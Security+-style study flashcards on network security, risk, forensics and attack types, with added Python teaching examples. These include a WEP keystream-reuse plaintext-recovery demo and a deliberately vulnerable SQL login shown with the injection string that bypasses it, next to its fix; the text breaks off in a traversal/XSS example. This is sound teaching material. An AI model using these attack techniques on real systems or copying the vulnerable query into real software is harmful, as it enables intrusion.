is a pair of firewalls that segregate web-facing server traffic from the internal network.
Web Application Firewall (WAF)
A _____ blocks attacks and provides security at Layer 7 of the OSI model. A _____ can protect a web server from cross-site scripting attacks.
_______ connect networks generally based on network addresses, usually IP network addresses. They can be used to create subnets which isolate broadcast domains, and to some extent isolate security zones with access control lists (ACLs).
______ connect hosts on a LAN by MAC address. They reduce or eliminate collisions. VLANs are connected by routers or multilayer switches. Client access should be
_______ allow scalable secure remote access by being able to handle the load of multiple heavily utilized VPN connections.
________ distribute the load among multiple web servers, increasing performance and reliability, and eliminate a single point of failure by providing redundancy.
Sniffers; protocol analyzer
______ capture network packets. They are usually integrated with a ________ that understands and analyses the content of the packets.
_____ are single fake systems meant to divert attackers away from a production network and to study hacker tools and techniques. A ____ emulates a set of servers.
____-based intrusion prevention systems go a step further than detection systems: they also block or neutralize attacks.
_______-based NIDS/NIPS (also HIDS/HIPS) need regular signature updates. They are best against known attacks.
_____-based NIDS/NIPS (also HIDS/HIPS) look for unusual events relative to a learned baseline. They are best against zero-day attacks.
______-based NIDS/NIPS (also HIDS/HIPS) match traffic patterns and protocol behaviour. To kill connections, a NIPS shuns or blocks the attacker and sends TCP resets to the victim side.
web security gateway/content filter
A ______, often implemented on a proxy server, blocks web sites by URL.
Uniﬁed Threat Management (UTM)
_____ appliances inspect and block traffic based on URL, malware, buffer overflows, cross-site scripting (XSS), cross-site request forgery (XSRF), and injection attacks.
A ______ caches web pages, while a reverse proxy sits in front of servers and can apply sophisticated filters. A spam filter is typically incorporated in the email gateway. An all-in-one security appliance integrates many of these functions.
Spanning Tree Protocol (STP)
A type of protocol that stops switching loops.
This standard features port-based Extensible Authentication Protocol (EAP). It is the most secure way to implement network access control (NAC) for contractors or for wireless network access. ______ is associated with RADIUS.
means that any connection not explicitly allowed is denied by default.
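Added example (not part of the original flashcards): an implicit-deny ACL evaluator. Rules are matched in order, the first match wins, and a packet that matches nothing is denied. The DMZ_ACL and the addresses are constructed for illustration.

```python
"""Implicit-deny ACL evaluator (added example, not from the original flashcards).
Rules are checked in order; the first match wins. If no rule matches, the
packet is denied: that is the 'implicit deny' the card describes."""
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str             # "permit" or "deny"
    src: str                # CIDR, e.g. "10.0.0.0/8"; "0.0.0.0/0" means any
    dst: str
    proto: str              # "tcp", "udp", "icmp" or "any"
    dport: Optional[int]    # None means any destination port

    def matches(self, pkt: dict) -> bool:
        if self.proto != "any" and self.proto != pkt["proto"]:
            return False
        if self.dport is not None and self.dport != pkt.get("dport"):
            return False
        src_ok = ipaddress.ip_address(pkt["src"]) in ipaddress.ip_network(self.src)
        dst_ok = ipaddress.ip_address(pkt["dst"]) in ipaddress.ip_network(self.dst)
        return src_ok and dst_ok


def evaluate(acl: list, pkt: dict) -> str:
    """Return 'permit' or 'deny'. No matching rule means deny."""
    for rule in acl:
        if rule.matches(pkt):
            return rule.action
    return "deny"   # implicit deny at the end of every ACL


# Hypothetical DMZ ACL (constructed): web traffic from anywhere to the web
# server, management SSH only from the internal admin subnet.
DMZ_ACL = [
    Rule("permit", "0.0.0.0/0", "192.0.2.10/32", "tcp", 443),
    Rule("permit", "0.0.0.0/0", "192.0.2.10/32", "tcp", 80),
    Rule("permit", "10.10.0.0/24", "192.0.2.10/32", "tcp", 22),
]


def demo():
    web = {"src": "203.0.113.5", "dst": "192.0.2.10", "proto": "tcp", "dport": 443}
    ssh_outside = {"src": "203.0.113.5", "dst": "192.0.2.10", "proto": "tcp", "dport": 22}
    ssh_admin = {"src": "10.10.0.7", "dst": "192.0.2.10", "proto": "tcp", "dport": 22}
    return (evaluate(DMZ_ACL, web), evaluate(DMZ_ACL, ssh_outside),
            evaluate(DMZ_ACL, ssh_admin))


if __name__ == "__main__":
    print(demo())
```

Note that SSH from the Internet is dropped without any explicit deny rule; an ACL that ends with "permit any" instead turns the same rule set into an allow-by-default policy.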
______ should be used to protect against SYN flood attacks, trace the source, generate alerts, and block attack traffic.
_____ prevents network disruption if both ends of a network cable are connected to different switch ports.
____ Logs from multiple sources should account for incident time offsets. The security log would show when a user attempted to log in at various times of the day.
Subnets and VLANs
____ and ____ separate broadcast and security domains. ____ are on routers. ____ are created on switches.
_______ has a one-to-one mapping between internal and external addresses.
_____ allows the mapping to change dynamically.
Port Address Translation (PAT)
______ allows multiple hosts to connect at the same time
Remote access policy; SSH
______ sets rules for remote access. Remote access should use a secure protocol such as ____ . A VPN concentrator provides remote access for large numbers of users.
Network Access Control (NAC)
_______ examines and remediates foreign hosts that attempt to connect to a network. It can also push patches and antivirus definitions and perform a virus scan before granting access.
In _______ physical servers host multiple virtual servers. This cuts down on the footprint. The specialized operating system that hosts the virtual machines is the ________.
______ is the term for an attack that aﬀects more than one virtual machine and/or the hypervisor
_______ utilizes virtualization to provision guests on demand.
In ______ as a Service (PaaS), developers create applications on a provider's platform.
In ____ as a Service (SaaS), the vendor supplies the software product.
In _____ as a Service (IaaS), users can start, stop and configure virtual servers.
was originally developed for IPv6. It can be used as the encryption piece of a VPN with L2TP setting up the tunnel, or it can do both.
ESP, AH and IKE.
IPSec protocols include ___, _____, and ____
SNMP, SNMPv1, SNMPv2, SNMPv3
____ is used to manage network devices including printers, servers, routers and switches. ____ and _____ are insecure protocols (community strings travel in cleartext). ______ is secure and provides data integrity, authentication, confidentiality and replay protection.
____ is a secure replacement for Telnet and FTP.
_____ replaces Telnet.
SCP and SFTP
___ and ____ replace FTP.
FTPS is another secure version of FTP, but it is not based on ____
____ resolves a host name to an IP address.
_____ attacks include spooﬁng and cache poisoning.
DNSSEC and TSIG
DNS security measures include _____, which signs zone data with public keys so that resolvers can verify responses, and _____, which authenticates transactions such as zone transfers and dynamic updates with a shared-secret HMAC.
______ transfers web pages. _____ does this securely using certificates.
_____ is the underlying protocol for HTTPS. It can also be used in SSTP to set up a VPN that does not require a VPN client setup.
_____ is the successor to SSL and fixes known weaknesses in it. It supports mutual authentication, in which the client as well as the server presents a certificate. It can also be used to secure traffic between SMTP servers.
IP, TCP, Man-in-the-Middle, SYN Flood
___ provides addressing and routing. An attacker can forge the source ____ address. ___ provides reliability through sequence numbers. An attacker might monitor network transmissions to predict a sequence number and forge an acceptable response. This is a _______ attack. The three-way TCP handshake can be exploited in a _____ attack.
____ is faster than TCP but unacknowledged. It is used in videocasting and VoIP.
______ is a UDP Denial of Service (DOS) attack.
ICMP (Internet Control Message Protocol)
_____ provides network reachability and diagnostics. It supports ping, tracert, and router messages such as redirects.
ICMP (Internet Control Message Protocol)
_____ attacks include Ping of Death, Smurf attack and bogus redirect messages.
IPv4, IPv6
___ has a 32-bit address space that is depleted. ____ has a 128-bit address space, enough for on the order of 10^20 addresses for every square inch of the earth's surface.
Storage Area Network (SAN) Protocols.
Fibre Channel over Ethernet (FCoE) and iSCSI run over your production network to build a SAN, so attacks on the production network also affect FCoE and iSCSI storage traffic.
Fibre Channel (FC)
_____ is an isolated network. Deploying an FC fabric provides multipathing, which increases bandwidth and fault tolerance.
_____ has decreased as newer protocols do not adhere to it
____ is weak. It has a 24-bit initialization vector. It should not be used. _____ is stronger: it adds EAP-based authentication and TKIP per-packet key mixing, although TKIP still runs on RC4.
___ replaces RC4 with AES. ______ is better than WPA because it replaces TKIP with CCMP, an AES mode that protects both confidentiality and integrity, whereas TKIP only patches RC4 with per-packet key mixing.
EAP is Extensible Authentication Protocol.
______ use EAP.
______ uses certiﬁcates.
PEAP (Protected EAP)
___ encapsulates EAP in an encrypted and authenticated TLS tunnel
LEAP (Lightweight EAP)
______ (Cisco) uses a modified MS-CHAP challenge/response to protect credentials and provide mutual authentication. The exchange can be cracked offline from captured traffic, so PEAP or EAP-TLS should be used instead.
Technical risk controls
____ would use specific hardware or software. They include screen lock, firewalls, IDSs/IPSs, ACLs, proximity locks and mantraps.
____ would avoid single points of failure and include security policy, fault-tolerant measures and recovery procedures.
Operational risk controls
_____ are daily controls including a security guard, auditing, user rights review and background investigations.
A _____ is a false alarm.
A ____ is where an attack is not identified. It is more serious than a false positive. In biometrics a false acceptance is more serious than a false rejection.
______ is checking an employee's work while they are on vacation to discover fraud and collusion.
Two software developers switching roles to eliminate a single point of failure caused by a singular skill set is an example of ______
_____ would be violated if the accounting manager could do both accounts payable and accounts receivable work. Rather, the accounting manager should just be able to approve work.
______ is based on hard numbers while ____ is based on subjective ranking.
____ is based on asset value and exposure, so risks are mitigated based on cost.
maximum tolerable downtime (MTD)
The _______ is the longest outage a business can accept after a disaster.
mean time to repair (MTTR)
The ______ should be less than the MTD.
recovery point objective (RPO)
The ____ is the point in time to which critical data and systems must be restored after a disaster, i.e., the maximum acceptable data loss.
recovery time objective (RTO)
The _____ should be shorter than the MTD. The RTO is the target time when critical systems should be back up and running after a disaster.
business impact analysis (BIA)
A _____ is a high-level analysis that identifies a company's exposure to the sudden loss of critical business functions.
Responses to Risk
Most mission impacting risks should be mitigated. However, risks cannot be eliminated.
Risks can be accepted if the cost to mitigate the risk is more than the value of the asset.
Risks can be ____ if the loss of the asset is unacceptable.
_____ uses virtualization to provision guests on demand. Security drawbacks of cloud computing are loss of physical control over data and blended systems and data
interconnection security agreement (ISA)
An ______ is between organizations that own and operate connected IT systems to document the technical and security requirements of necessary data flows.
_____ is a part of configuration management. It handles system upgrades and modifications so they do not impact security.
________ ensures that the proper configurations are reapplied to systems and attacks are contained.
Order of Volatility
Collect the most perishable material first: CPU cache, RAM, swap file, hard drive, then remote logs. Create a bit-for-bit image of the hard drive. Hash the original before and after imaging and hash the image itself; all three hashes must match.
Record Time Oﬀset
Events from different sources can be correlated into a chain of events only if each record's time offset (time zone and clock skew) is known and corrected.
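Added example (not part of the original flashcards): correcting record time offsets before correlating logs. The three sources, their time zones, the 2-minute clock skew on the domain controller and the log lines are all constructed for illustration.

```python
"""Normalizing record time offsets across log sources (added example; the
sources, skews and log lines are constructed for illustration)."""
from datetime import datetime, timedelta, timezone

# Per-source correction: the timezone the source stamps in, and its measured
# clock skew in seconds (positive = the source's clock runs fast).
SOURCES = {
    "fw":  {"tz": timezone(timedelta(hours=-5)), "skew_s": 0},
    "web": {"tz": timezone.utc,                  "skew_s": 0},
    "dc":  {"tz": timezone(timedelta(hours=-5)), "skew_s": 120},  # DC is 2 min fast
}

# Constructed records: (source, timestamp exactly as that source wrote it, message)
RAW = [
    ("dc",  "2014-06-01 09:02:38", "4624 successful logon jsmith from 203.0.113.5"),
    ("fw",  "2014-06-01 09:00:10", "permit tcp 203.0.113.5 -> 192.0.2.10:443"),
    ("web", "2014-06-01 14:00:12", "GET /login 200 from 203.0.113.5"),
    ("web", "2014-06-01 14:00:35", "POST /login 302 from 203.0.113.5"),
    ("dc",  "2014-06-01 09:02:20", "4625 failed logon jsmith from 203.0.113.5"),
]


def normalize(source: str, local_ts: str) -> datetime:
    """Read the stamp in the source's own timezone, remove its clock skew, return UTC."""
    cfg = SOURCES[source]
    local = datetime.strptime(local_ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=cfg["tz"])
    return (local - timedelta(seconds=cfg["skew_s"])).astimezone(timezone.utc)


def timeline(records):
    """Return events ordered by corrected UTC time as (iso_utc, source, message)."""
    events = [(normalize(src, ts), src, msg) for src, ts, msg in records]
    events.sort(key=lambda e: e[0])
    return [(t.strftime("%Y-%m-%dT%H:%M:%SZ"), src, msg) for t, src, msg in events]


if __name__ == "__main__":
    for line in timeline(RAW):
        print(*line)
```

Without the skew correction the two DC events would land at 14:02:20Z and 14:02:38Z, after the web login, and the failed-then-successful logon sequence would look unrelated to the HTTP POST.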
Chain of custody
_____ is continuously documenting the state and location of data and hardware from collection to Disposition.
Big Data Analysis
______ can discover the locus of attacks by correlating attacks against multiple companies
Collect Evidence In Order of Volatility
▪ CPU Registers ▪ CPU Cache ▪ Memory ▪ ARP Cache ▪ Swap File ▪ Optical Media ▪ Remote Logs
is where general measures are taken against malware.
is the first response in incident management to clients reporting spikes in malware infections.
can provide automated notification of item removal.
is the auditing or reviewing of an organization's security systems (both physical and logical) on a regular basis.
Consistent with collecting evidence, contain the incident.
is where the team analyses the incident and determines steps against future occurrence.
Security policy training
_____ should be customized by the role of the user.
Shoulder Surﬁng, Clean Desk Policy and Sanitization.
Training should include protection from shoulder surﬁng. It also includes a clean desk policy, data sanitization, data labeling and protection by classiﬁcation.
Social Networking and P2P File Sharing.
Users should be educated to avoid disclosing information via social networking sites and/or P2P ﬁle sharing
HVAC systems should be integrated into the fire alarm system to help prevent a fire from spreading and should shut down when a fire is detected in the datacenter. FM-200, a clean agent that does not damage equipment, is the preferred suppression method.
EMI is electromagnetic interference, while RFI is radio frequency interference.
Hot and cold aisles
____ regulate cooling within a datacenter to maximize airflow and increase HVAC efficiency.
It is a detective security control that could determine if confidential data or equipment is being removed.
____ provide access based on facial recognition among other factors.
A _____ is a confined space that only one user can enter at a time. An outer door locks when the user enters. To leave the mantrap and gain access to the protected area, the user must successfully authenticate to the inner door.
business impact analysis (BIA)
A ___ defines recovery point objectives (RPO) and recovery time objectives (RTO).
service level agreement (SLA)
A _____ is a formal contract between two companies that is more enforceable than an informal memorandum of understanding (MOU).
business partners agreement (BPA)
A _____ lists what partners and contractors should and shouldn't do.
interconnection security agreement (ISA)
An ______ is between organizations that own and operate connected IT systems to document the technical and security requirements of necessary data flows.
single points of failure
Measures that remove _____ include RAID, clustered servers, redundant power supplies, and redundant ISPs.
Backup Execution and Frequency
Backup types include full, differential, and incremental. ▪ Data deduplication reduces the size of backups and the time to back up and restore. ▪ One copy of a backup should be stored onsite for quick recovery. Another copy should be stored offsite, away from the main site, for disaster recovery.
Backup/Backout Contingency Plans
In the event that Plan A fails, have a preconceived and viable Plan B. In the event the weekend datacenter upgrades fail, have a backout plan to undo any changes.
____ includes redundant circuits, RAID, clustered servers, network load balancing, mirrored memory, redundant power supplies and redundant ISPs.
A ___ is an alternate location with no data or equipment.
A ______ describes a semi-operational site. It provides a building and network equipment, but not current application data
The highest level of availability is provided because the site has full equipment and current data
conﬁdentiality, integrity, and availability.
The parts of CIA are ____, ______, and _____
is protection from unwanted disclosure. It is the primary concern of governments in terms of data security. It is preserved by strong authentication, strong encryption, ACLs, least privilege, need to know and sanitization of retired computer systems. Items that could compromise confidentiality include USB drives and spyware.
is the continuous operation of computing systems and networks. - Redundancy and fault tolerant measures such as RAID and clustered servers increase availability. - A virtualization farm increases availability.
____ is the concept that addresses the threat of data being modified without authorization. Integrity is provided by hashing and input validation. ▪ A forensic image of a computer's memory or hard drive should be run through a hash such as SHA-256 or SHA-512 and the digest recorded. ▪ Kerberos, by contrast, provides centralized authentication, not file integrity protection.
___ is provided by fencing, lighting, locks, CCTV, guards, fire alarms, fire drills, and alternate escape routes.
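Added example (not part of the original flashcards) covering both the order-of-volatility card above (hash before and after imaging, and hash the image) and the integrity card here: chunked SHA-256/SHA-512 verification of an acquisition. The "disk" is a constructed byte string standing in for a device, and acquire() stands in for a dd-style copy.

```python
"""Verifying a forensic image with hashes (added example, not from the flashcards).
The device and image below are constructed byte strings standing in for a hard
drive and its bit-for-bit acquisition."""
import hashlib
import io


def hash_stream(fobj, algo: str = "sha256", chunk_size: int = 1 << 20) -> str:
    """Hash a file-like object in chunks so a multi-terabyte image never has to fit in RAM."""
    h = hashlib.new(algo)
    for chunk in iter(lambda: fobj.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def hash_bytes(data: bytes, algo: str = "sha256") -> str:
    return hash_stream(io.BytesIO(data), algo)


def acquire(device: bytes) -> bytes:
    """Stand-in for a bit-for-bit acquisition (a dd-style copy of the device)."""
    return bytes(device)


def verify_acquisition(device: bytes, image: bytes, algos=("sha256", "sha512")) -> dict:
    """Hash the source before imaging, hash the image, then re-hash the source.
    All three must agree for every algorithm; a mismatch means the source changed
    during acquisition (no write blocker?) or the image is not faithful."""
    report = {}
    for algo in algos:
        before = hash_bytes(device, algo)
        img = hash_bytes(image, algo)
        after = hash_bytes(device, algo)      # re-read the source after imaging
        report[algo] = {"source_before": before, "image": img, "source_after": after,
                        "verified": before == img == after}
    return report


def all_verified(report: dict) -> bool:
    return all(r["verified"] for r in report.values())


# Constructed evidence: a 3 MiB fake disk with a recognizable header.
DISK = b"EVIDENCE-DISK-0001" + bytes(range(256)) * (3 * 4096)


def demo():
    good = verify_acquisition(DISK, acquire(DISK))
    tampered = bytearray(acquire(DISK))
    tampered[100] ^= 0x01                     # a single flipped bit in the image
    bad = verify_acquisition(DISK, bytes(tampered))
    return all_verified(good), all_verified(bad)


if __name__ == "__main__":
    print(demo())
```

Record the digests in the chain-of-custody log at acquisition time; anyone re-hashing the image later can then prove it is unchanged, and a single flipped bit is enough to fail verification.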
___ are often attached to executable files. Their primary goal is replication by spreading from file to file. An act as simple as opening an attachment can infect a system. Effects can include data deletion, file corruption, file alteration, data theft and DoS. ▪ Cell phones with network access and the ability to store data files are susceptible to viruses. ▪ An armored virus hides its location and is difficult to reverse engineer in a lab.
A ___ continually changes to prevent signature-based detection.
_____ are self-contained programs. They can spread by network shares with no user interaction. As a result, worms spread faster than viruses. They can email a copy of themselves to everyone in the address book of an infected computer.
____ are suspicious system-level kernel modules which modify file system operations. They are characterized by hooking processes and erasing logs. Hooking processes hides them from discovery.
____ disguise themselves as harmless or "friendly" files.
A ____ makes an alternate/unsecured entry point to an application or computer.
A ____ is malicious code that is triggered by a time, date or event. For example, a disgruntled employee inserts additional code into the payroll system which will activate only if he is dismissed.
A ____ is a large group of infected computers/bots/zombies that have been taken over by hackers. An indication is several PCs that are running extremely slow, and are opening many connections to the same unknown destination.
____ are pop-up advertisements, often targeted based on browser history. Adware is often bundled with freely downloaded software.
_____ secretly collects information about users. Spyware negatively affects confidentiality. It can slow down a PC. It uses tracking cookies and browser history.
_____ is malware that extorts users to pay a ransom to decrypt their data, hard drive or source code. For example, an attacker that encrypts a user's documents and demands payment to decrypt them.
Users that mistype a URL and end up at a web site that infects them with malware have been victims of ______
Major attack types include man-in-the-middle, DDoS, DoS, replay, smurf attack, spooﬁng, spam, phishing, spim, vishing, spear phishing, Xmas attack, pharming, privilege escalation, DNS poisoning and ARP poisoning.
VLAN tagging standard
802.1Q; Q-in-Q (802.1ad) stacks a second 802.1Q tag on a frame.
DoS (Denial of Service)
A _____ attack originates from one computer
DDoS (Distributed Denial of Service)
A _____ attack originates from multiple computers and attempts to make a computer or network unavailable to legitimate users by consuming resources such as network connections.
DDoS (Distributed Denial of Service)
An example of a ____ would be a large amount of transmissions from multiple external computers to the web server, which is now inaccessible to users.
A ___ attack is a DDoS attack that uses UDP packets.
___ is a DDoS attack in which multiple external hosts start but do not finish the three-way TCP handshake, exhausting the half-open connection queue.
____ are a DoS attack in which the attacker impersonates the IP address of the victim and pings the subnet broadcast address.
_____ scans set every TCP flag at once, lighting the packet up like a Christmas tree. This consumes resources and can be used in a DoS, or for stack fingerprinting, in which the target OS is identified from how it responds.
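Added example (not part of the original flashcards): detection logic for the two cards above, a SYN flood (many SYNs with no completed handshake against one destination) and Xmas packets (all flags set). The packet summary lines are constructed; the "time src dst dport flags" format is an assumption, not any tool's real export format.

```python
"""Spotting a SYN flood and Xmas scans in packet summaries (added example, not from
the flashcards). The packet lines are constructed; the 'time src dst dport flags'
format is assumed for illustration."""
from collections import Counter

XMAS = {"URG", "ACK", "PSH", "RST", "SYN", "FIN"}


def parse(line: str) -> dict:
    t, src, dst, dport, flags = line.split()
    return {"t": float(t), "src": src, "dst": dst, "dport": int(dport),
            "flags": set(flags.split(",")) if flags != "-" else set()}


def is_xmas(pkt: dict) -> bool:
    """Every TCP flag set at once: never legitimate, used for fingerprinting or DoS."""
    return XMAS <= pkt["flags"]


def detect(lines, syn_threshold: int = 50):
    """Return ({(dst, dport): unacknowledged SYN count over threshold}, [xmas sources]).
    A SYN counts as half-open if the same (src, dst, dport) never sends a plain ACK,
    i.e. the client never finished the handshake."""
    pkts = [parse(l) for l in lines]
    acked = {(p["src"], p["dst"], p["dport"]) for p in pkts
             if "ACK" in p["flags"] and "SYN" not in p["flags"]}
    half_open = Counter()
    for p in pkts:
        if p["flags"] == {"SYN"} and (p["src"], p["dst"], p["dport"]) not in acked:
            half_open[(p["dst"], p["dport"])] += 1
    floods = {k: v for k, v in half_open.items() if v >= syn_threshold}
    xmas = sorted({p["src"] for p in pkts if is_xmas(p)})
    return floods, xmas


def build_sample():
    """Constructed capture: one legitimate handshake, then a spoofed SYN flood from 80
    different apparent sources, then one Xmas packet."""
    lines = ["0.00 198.51.100.7 192.0.2.10 443 SYN",
             "0.01 192.0.2.10 198.51.100.7 49152 SYN,ACK",
             "0.02 198.51.100.7 192.0.2.10 443 ACK"]
    for i in range(80):
        lines.append(f"{1 + i * 0.01:.2f} 203.0.113.{i + 1} 192.0.2.10 443 SYN")
    lines.append("3.00 198.51.100.9 192.0.2.10 22 URG,ACK,PSH,RST,SYN,FIN")
    return lines


if __name__ == "__main__":
    print(detect(build_sample()))
```

Counting per destination rather than per source matters: in a spoofed flood every SYN carries a different source, so a per-source threshold would never fire.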
Attackers can spoof the source IP address, the MAC address or a Web site. URL spooﬁng is phishing.
If the IP address is spoofed for the purpose of impersonation, then this is a _____ attack. The attacker monitors the packets, guesses the sequence number, knocks out the victim with a SYN attack and injects his own packets, claiming to have the address of the victim.
Replay attacks Man-in-the-middle
______ capture and then replay the authentication credentials at a later time or date. ______ attacks take place in real time. SSL certificate warnings might indicate a man-in-the-middle attack. A replay attack might capture valid wireless traffic for later retransmission to discover the encryption key. The attacking computer will have large network traffic dump files.
DNS cache poisoning
_____ inserts false information in a DNS name server's cache.
redirects web site traffic to a spoofed web site by changing the DNS records, the DNS cache or the hosts file.
In ___, an attacker answers an ARP request for the victim's IP address with the attacker's own MAC address, so traffic meant for the victim is delivered to the attacker.
_____ attempts to gain sensitive information by masquerading as trustworthy.
______ targets select groups of people with something in common.
_______ is targeted phishing of senior executives and other high-profile targets.
______ is phishing over the phone.
_____ is unsolicited advertising via email.
______ is SPAM over Instant Messenger
_____ is SPAM over SMS text messaging.
mail relay server
The best location for a spam filter is in front of the _____. The spam folder settings should be checked if a user is not able to receive email from a specific sender.
______ often do more damage than outside hackers. WikiLeaks is an example of this. Intrusion Detection/Prevention Systems also monitor/block inside attacks. Auditing is also helpful.
In _____ an attacker with access to a user account exploits a bug or configuration error to gain elevated privileges.
In ______ attacks the hacker probes for and attempts to compromise the weakest link in a chain of trust. For instance, if a small supplier has access to an extranet for a large company, the attacker will attempt to socially engineer the weakest employee at the small supplier.
_____ attacks target web browsers. A modern and patched browser should be used.
Server-side input validation
______ is more secure than client-side input validation.
Watering hole attack
______ hackers infect web sites of interest to their targets.
______ is looking over someone's shoulder to view conﬁdential information.
_____ involves sorting through the trash to discover information to be used in a subsequent attack.
_____ is following closely behind an authorized user to gain unauthorized access to a secured area before the door is closed. Countermeasures to tailgating include mantraps, security guards and user education.
_____ are falsehoods that convince a user to harm their, or their organization's, computer or security posture. Suspected hoax emails to users should be forwarded to administrators and not to other users.
_____ is phishing directed against an organization's hierarchy. An example of whaling is a convincing, well-researched email attack sent to the company's Chief Executive Oﬃcer (CEO).
_____ is phishing directed against a particular, high-value group
_____is voice phishing. It leverages VoIP phone calls.
Social Engineering Principles of Attack.
These attacks include authority, intimidation, consensus/social proof, scarcity, urgency, familiarity/liking and trust
If users are encouraged to click on a link in an email to obtain exclusive access to the newest version of a popular smartphone, it is an example of _____ .
____ points are unauthorized wireless access points that are used to gain access to a secure network.
_____ are duplicate access points that has been created to allow a hacker to conduct a man-in-the-middle attack.
RFI and EMI
___ and ___ are eliminated by fiber optic cabling.
RFI and EMI
___ and ___ are mitigated by shielding, coaxial and STP cabling, and using conduits.
Bluejacking, Bluesnarﬁng, and Bluebugging.
These exploits use Bluetooth. Bluejacking pops up unwanted messages on a smartphone. Bluesnarfing is more serious because it steals data from the phone, such as the address book and emails. In bluebugging the attacker gains control of the phone and can, for example, eavesdrop on the user's conversations.
In ____ a hacker attacks a dial-up site.
In _____ the location and specifics of wireless access points are documented by nearby chalk marks. It involves randomly attempting to connect to wireless network access points and documenting the locations.
In _____ a driver searches for Wi-Fi networks using a portable computer or smart phone. War driving is a reason why wireless access points should not be placed near a building's perimeter.
IV Attacks and Packet Sniﬃng.
The initialization vector (IV) is a semi-random value combined with the encryption key so that the same key yields a different keystream for each packet. Longer and more random IVs provide more security. WEP uses only a 24-bit IV, sent in cleartext, so IVs repeat after a few thousand frames; an attacker who sniffs enough packets can recover the RC4 key. Packet sniffing can also discover passwords and other data sent in cleartext by protocols such as FTP, Telnet, PAP, SNMPv1 and v2.
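Added example (not part of the original flashcards): why a 24-bit IV is fatal for a stream cipher. A toy RC4 plus a WEP-style per-frame key (IV || shared key) shows that two frames under the same IV share a keystream, so XORing a known plaintext recovers the other frame, and the birthday bound shows how quickly a random IV repeats. The key, IV and frame contents are constructed; this is not a WEP implementation.

```python
"""Why WEP's 24-bit IV is fatal (added example, not from the flashcards): RC4 keystream
reuse lets an eavesdropper recover plaintext, and the IV space is small enough that reuse
is inevitable. Toy RC4 and constructed WEP-style frames; not a real WEP implementation."""
import math


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is broken; it is shown only to illustrate keystream reuse."""
    S = list(range(256))
    j = 0
    for i in range(256):                          # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                            # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, root_key: bytes, plaintext: bytes) -> bytes:
    """WEP style: per-frame RC4 key = IV || shared key; the IV is transmitted in the clear."""
    return xor(plaintext, rc4_keystream(iv + root_key, len(plaintext)))


def recover_with_known_plaintext(c1: bytes, p1: bytes, c2: bytes) -> bytes:
    """Same IV twice means the same keystream: keystream = c1 ^ p1, so p2 = c2 ^ keystream."""
    return xor(c2, xor(c1, p1))


def frames_until_iv_repeat(p: float = 0.5, iv_bits: int = 24) -> float:
    """Birthday bound: frames needed before some IV repeats with probability p (random IVs)."""
    return math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - p)))


ROOT_KEY = bytes.fromhex("0123456789")     # constructed 40-bit WEP key
IV = b"\x01\x02\x03"                        # constructed IV reused by the access point


def demo():
    p1 = b"GET /index.html HTTP/1.1\r\n"            # frame whose content the attacker knows
    p2 = b"POST /login user=admin&pw=hunter2"       # target frame sent under the same IV
    c1 = wep_encrypt(IV, ROOT_KEY, p1)
    c2 = wep_encrypt(IV, ROOT_KEY, p2)
    recovered = recover_with_known_plaintext(c1, p1, c2[:len(p1)])
    return recovered, round(frames_until_iv_repeat())


if __name__ == "__main__":
    print(demo())
```

The recovered bytes are the first 26 bytes of the second frame with no knowledge of the key at all; at about 4,800 frames for a 50% chance of an IV repeat, a busy access point reuses IVs within minutes. The real WEP break (FMS/PTW) goes further and recovers the root key from weak IVs, which is why WPA2 replaced RC4 with AES-CCMP.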
▪ A buffer stores data and instructions. An early buffer attack is a _____. ▪ Measures to protect against buffer overflows include input validation, patching, and the no-execute bit used by Data Execution Prevention (DEP). ▪ DEP is a feature of modern CPUs and operating systems that marks memory pages as either data or code, so injected data on the stack or heap cannot be executed.
____ is the insertion of attacker-supplied SQL through unvalidated input to read or modify a database. Parameterized queries and stored procedures defend against it, unless the stored procedure itself builds dynamic SQL from its inputs.
compromises the logic of an XML application or service
exploits web based applications that construct LDAP statements based on user input
Input validation, secure coding practices and patching are defenses for ____ .
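Added example (not part of the original flashcards): the SQL injection card above, shown as a vulnerable login query beside its parameterized fix. It uses an in-memory SQLite database with constructed users; the table, accounts and payload are made up for illustration.

```python
"""SQL injection, vulnerable and fixed (added example, not from the flashcards).
In-memory SQLite with a constructed users table."""
import sqlite3


def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "s3cret", "admin"), ("bob", "pass", "user")])
    return db


def login_vulnerable(db, user: str, pw: str):
    # String concatenation: user input becomes part of the SQL grammar.
    q = f"SELECT role FROM users WHERE name = '{user}' AND password = '{pw}'"
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_safe(db, user: str, pw: str):
    # Parameterized query: the driver sends values separately from the statement,
    # so quotes and comment markers in the input stay data.
    row = db.execute("SELECT role FROM users WHERE name = ? AND password = ?",
                     (user, pw)).fetchone()
    return row[0] if row else None


def demo():
    db = setup()
    # "alice' --" closes the string and comments out the password check:
    #   ... WHERE name = 'alice' --' AND password = 'anything'
    user, pw = "alice' --", "anything"
    return login_vulnerable(db, user, pw), login_safe(db, user, pw)


if __name__ == "__main__":
    print(demo())
```

The vulnerable version returns "admin" for a payload containing no valid password; the parameterized version returns None. A stored procedure that concatenates its arguments into an EXEC string is exactly as exposed as login_vulnerable.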
A ____ exploits insufficient validation of user-supplied file names so that characters representing "traverse to parent directory" (../) are parsed. The goal is to access a file that is not intended to be accessible, such as a password file or other confidential data.
In _____, an attacker injects HTML or script into dynamically generated content on a web page through an input mechanism, such as a form field. The injected script runs in other users' browsers in the context of the vulnerable site, with the same privileges as the application's own pages.
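Added example (not part of the original flashcards): the directory traversal and XSS cards above, each as a vulnerable function beside a hardened one. The web root, the traversal payload and the script payload are constructed; posixpath is used so the example behaves the same on any platform.

```python
"""Directory traversal and XSS, vulnerable and fixed (added example, not from the
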